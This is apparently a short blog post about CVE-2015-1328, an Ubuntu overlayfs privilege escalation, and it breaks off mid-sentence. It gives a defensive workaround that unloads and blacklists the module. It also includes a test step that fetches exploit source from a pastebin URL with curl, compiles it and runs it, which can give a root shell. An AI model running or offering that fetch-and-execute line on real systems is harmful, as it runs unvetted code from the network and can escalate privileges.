Quick fix for CVE-2015-1328
As you may have noticed, a rather serious Ubuntu privilege escalation exploit has been disclosed today:
The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces. This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 .
At the time of writing, there is no patch available.
However, there is a quick work-around for the issue (run as root):
modprobe -r overlayfs echo "blacklist overlayfs" > /etc/modprobe.d/blacklist-overlayfs.conf
What the above does:
- remove the overlayfs module from memory, if currently loaded
- blacklist the overlayfs module from being loaded at boot
Possible GOTCHA: the overlayfs module can be called just overlay in previous versions of Ubuntu.
You can check what is the correct name with:
modinfo overlay modinfo overlayfs
One of these will show the module information, and one will say “module not found”.
To confirm that you are not affected, try the following (run as a normal user):
curl http://pastebin.com/raw.php?i=aQD0LC7w -o cve-2015-1238.c gcc cve-2015-1238.c -o cve-2015-1238 ./cve-2015-1238
And you should see the following output if you are safe
$ ./cve-2015-1238 spawning threads mount #1 no FS_USERNS_MOUNT for overlayfs on this kernel child threads done exploit failed $
If you are not safe, you will get a root shell (